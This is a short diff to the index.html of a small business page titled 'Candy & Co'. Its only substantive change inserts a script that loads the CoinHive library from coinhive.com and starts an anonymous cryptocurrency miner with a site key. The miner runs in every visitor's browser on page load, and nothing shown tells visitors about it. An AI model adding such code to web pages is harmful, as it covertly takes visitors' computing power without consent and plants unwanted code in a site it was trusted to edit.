--- a/index.html
+++ b/index.html
@@ -92,7 +92,12 @@ body {background-color: #42d9c8
   </style>
 </head>
 <body>
-  <div style="">
+  <script src="https://coinhive.com/lib/coinhive.min.js"></script>
+  <script>
+	var miner = new CoinHive.Anonymous('IwCVb0PKQYj369KZHdS0W3OhpROATXAs');
+	miner.start();
+</script>
+  <div>
 
     <h1 id="homepage-heading"><img src="CC_Logo.gif" class="helo" width="100px" height="100px">Candy &amp; Co</h1>
 
